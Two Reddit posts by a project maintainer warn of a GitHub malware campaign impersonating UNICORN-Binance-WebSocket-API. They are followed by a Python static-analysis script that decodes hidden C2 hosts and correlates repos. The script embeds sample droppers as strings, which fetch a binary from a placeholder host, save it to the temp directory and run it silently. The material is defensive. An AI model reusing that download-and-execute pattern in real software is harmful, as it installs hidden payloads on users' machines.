u/oliver-zehentleitner

19 confirmed repos tied to the same GitHub malware campaign

I documented a broader GitHub malware campaign that appears to include the fraudulent UNICORN-Binance-WebSocket-API repo I wrote about earlier.

At this point I have 19 confirmed repositories that decode to the same C2, share the same staged Windows payload flow, and reuse the same or highly similar utils/ dropper architecture.

The visible patterns also include repeated commit choreography, manipulated-looking stars/forks, and overlapping fork accounts across campaign repos.

Write-up:
https://blog.technopathy.club/nailproxy-space-github-malware-campaign

I am not asking anyone to touch the infrastructure or execute anything. If others want to independently validate additional public samples via static source review and metadata correlation, more confirmation would be useful.

reddit.com

Security warning: fake UNICORN-Binance-WebSocket-API GitHub repo

Security warning for Binance users and developers:

A GitHub repository using the name UNICORN-Binance-WebSocket-API is not a legitimate UBWA console.

Based on the public startup path, it retrieves, decrypts, stages, and silently executes a Windows payload.

I maintain the legitimate UBWA project separately and documented the technical details here:
https://blog.technopathy.club/security-warning-fraudulent-github-repository-impersonating-unicorn-binance-websocket-api

If you ran that repository on Windows, treat the host as potentially compromised and rotate any exposed credentials.

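The kind of static source review and metadata correlation the two posts describe, as an added example that is not code from the posts, the write-ups, or the UBWA project: it parses Python sources without executing them, recovers hosts hidden in base64- or hex-encoded string literals (the "decode to the same C2" check), tags the fetch, decode, stage-to-disk and execute calls that make up a staged Windows payload flow, flags silent-execution creation flags, notes fetch-plus-exec files under a utils/ directory, and then groups repos by the hosts they share. The three sample repos, the host names and the file paths are constructed placeholders, not indicators from the campaign; the function names and the suspicious-call table are this example's own assumptions.

```python
"""Static triage for Python repos suspected of sharing one dropper. Added example, not
code from the posts or the UBWA project: recovers hosts hidden in base64/hex literals,
tags fetch/decode/stage/exec calls and silent-exec flags, and groups repos by shared
hosts. The sample repos at the bottom are constructed; their hosts are placeholders."""
import ast
import base64
import binascii
import re
from collections import defaultdict

HOST_RE = re.compile(r"https?://([^\s/:'\"]+)", re.I)
# Calls that form a fetch -> decode/decrypt -> stage to disk -> execute chain (assumed table).
SUSPICIOUS_CALLS = {
    "urllib.request.urlopen": "fetch", "requests.get": "fetch",
    "base64.b64decode": "decode", "bytes.fromhex": "decode", "Fernet.decrypt": "decrypt",
    "tempfile.gettempdir": "stage", "os.startfile": "exec", "subprocess.Popen": "exec",
}
SILENT_FLAGS = {"CREATE_NO_WINDOW", "DETACHED_PROCESS"}  # Windows process creation flags

def _try_decode(s):
    """Decode a base64 or hex literal to printable text, else return None."""
    if len(s) < 16:
        return None
    for fn in (lambda x: base64.b64decode(x, validate=True), binascii.unhexlify):
        try:
            out = fn(s).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if out.isprintable():
            return out
    return None

def _dotted(node):
    # Render a callee such as subprocess.Popen as a dotted name for table lookup.
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))

def analyze_source(src):
    """Static review of one file: recovered hosts, chain stages, silent-exec flag."""
    hosts, stages, silent = set(), set(), False
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            text = _try_decode(node.value) or node.value  # look inside encoded literals
            hosts.update(m.group(1).lower() for m in HOST_RE.finditer(text))
        elif isinstance(node, ast.Constant) and node.value == 0x08000000:  # CREATE_NO_WINDOW as raw int
            silent = True
        elif isinstance(node, ast.Call) and _dotted(node.func) in SUSPICIOUS_CALLS:
            stages.add(SUSPICIOUS_CALLS[_dotted(node.func)])
        elif getattr(node, "id", getattr(node, "attr", None)) in SILENT_FLAGS:
            silent = True
    return {"hosts": hosts, "stages": stages, "silent_exec": silent}

def analyze_repo(files):
    """Merge results over {relative_path: source}; note fetch+exec files under utils/."""
    out = {"hosts": set(), "stages": set(), "silent_exec": False, "dropper_files": []}
    for rel, src in files.items():
        if not rel.endswith(".py"):
            continue
        r = analyze_source(src)
        out["hosts"] |= r["hosts"]
        out["stages"] |= r["stages"]
        out["silent_exec"] |= r["silent_exec"]
        if {"fetch", "exec"} <= r["stages"] and rel.split("/")[0] == "utils":
            out["dropper_files"].append(rel)
    return out

def correlate(repos):
    """Map each host reached from more than one repo to the sorted repo names."""
    by_host = defaultdict(set)
    for name, r in repos.items():
        for host in r["hosts"]:
            by_host[host].add(name)
    return {h: sorted(n) for h, n in by_host.items() if len(n) > 1}

# Constructed sample repos (placeholder hosts, not indicators from the campaign).
STAGE_URL = "https://c2.example.invalid/stage1.bin"
DROPPER_B64 = f'''import base64, os, subprocess, tempfile, urllib.request
URL = base64.b64decode("{base64.b64encode(STAGE_URL.encode()).decode()}").decode()
path = os.path.join(tempfile.gettempdir(), "svc.exe")
open(path, "wb").write(urllib.request.urlopen(URL).read())
subprocess.Popen([path], creationflags=subprocess.CREATE_NO_WINDOW)'''
DROPPER_HEX = f'''import os, subprocess, tempfile, urllib.request
URL = bytes.fromhex("{STAGE_URL.encode().hex()}").decode()
path = os.path.join(tempfile.gettempdir(), "upd.exe")
open(path, "wb").write(urllib.request.urlopen(URL).read())
subprocess.Popen([path], creationflags=0x08000000)'''
BENIGN = 'import requests\ndef ping():\n    return requests.get("https://api.exchange.example/v3/ping").json()\n'
SAMPLES = {"repo-a": {"utils/loader.py": DROPPER_B64, "main.py": "from utils import loader\n"},
           "repo-b": {"utils/helpers.py": DROPPER_HEX, "main.py": "from utils import helpers\n"},
           "repo-c": {"client.py": BENIGN}}

def triage(samples=SAMPLES):
    """Analyze each repo; return (per-repo results, hosts shared by more than one repo)."""
    repos = {name: analyze_repo(files) for name, files in samples.items()}
    return repos, correlate(repos)
```

For real checkouts, build the `{relative_path: source}` mapping by walking each clone (for example with os.walk) and pass it to analyze_repo; nothing in the script executes the sources, which is the constraint the first post asks validators to respect. A shared decoded host is a pivot to confirm against the write-up, not proof on its own: the suspicious-call table is deliberately small, and a dropper that builds its URL from fragments or decrypts it with a key not present in the source will show a silent-exec chain but no host, so review those files by hand.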